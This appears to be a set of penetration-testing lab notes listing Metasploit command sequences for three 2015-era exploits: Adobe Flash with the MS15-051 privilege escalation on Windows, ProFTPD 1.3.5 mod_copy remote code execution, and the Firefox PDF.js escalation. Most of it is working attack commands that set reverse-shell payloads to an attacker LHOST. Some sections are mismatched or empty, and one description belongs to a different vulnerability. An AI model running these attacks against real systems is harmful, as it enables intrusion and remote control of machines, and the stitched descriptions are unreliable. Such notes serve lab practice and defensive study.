Tested on :

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run
getuid
Local privileges escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run
getuid

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 the 2015-06-09
Vulnerability discovered exploited in the Exploit Kits the 2015-06-16
Metasploit PoC provided the 2015-06-25

PoC provided by :

Reference(s) :

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

Centos 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the ‘nobody’ user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

This vulnerability is only triggered in particular conditions:
– ProFTPD need to have the rights to write into a web accessible folder having the privileges of ProFTPD.
– SELinux must be disabled

Commands :

ProFTPD is running with user and group “nobody”
ProFTPD is configured with “LoadModule mod_copy.c” in proftpd.conf file
A “test” folder has been created in “/var/www/html/“ with nodody:nobody privileges
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run
id
Done !

PoC provided by :

Reference(s) :

Affected version(s) :

Firefox versions bellow version 37

Tested on :

Windows 7 SP1 with Firefox version 36.0.4

Description :

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs (CVE-2015-0802). PDF.js (CVE-2015-0816) is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Commands :

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.6.138
run
SYSTEMINFO